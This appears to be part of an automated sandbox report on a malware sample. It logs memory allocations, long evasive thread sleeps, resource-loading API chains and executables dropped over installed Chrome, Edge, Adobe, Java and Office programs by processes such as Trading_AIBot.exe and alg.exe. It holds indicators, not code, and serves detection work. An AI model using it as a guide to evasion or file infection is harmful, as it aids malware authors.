Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2D4C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2C00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2E70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2CA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2320000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 24E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 44E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2D00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 3170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2D90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 840000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2370000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 21B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: B40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: 26C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: 2560000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 13_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 1668
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 419
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4599
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 3068
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 6735
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Window / User API: threadDelayed 9377
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Window / User API: threadDelayed 410
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\Public\Libraries\aymtmquJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Users\Public\alpha.pif API coverage: 6.3 %
Source: C:\Users\Public\alpha.pif API coverage: 7.8 %
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2968 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5440 Thread sleep count: 1668 > 30
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99872s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99714s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99589s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99449s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -99172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98887s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98664s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98534s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98299s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -98156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97796s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97527s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97274s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -97150s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -96968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -96825s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -96570s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -96299s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95822s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95662s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95499s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95388s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95189s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -95047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5080 Thread sleep count: 419 > 30
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94910s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94785s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94529s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94371s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94242s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -94117s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -93939s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -93715s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 6116 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7344 Thread sleep time: -720000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6104 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 760 Thread sleep count: 4599 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4772 Thread sleep time: -220000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6040 Thread sleep count: 284 > 30
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 2932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6976 Thread sleep time: -70000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99655s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99543s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -99109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98999s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98761s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98639s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98527s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98200s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -98093s >= -30000s
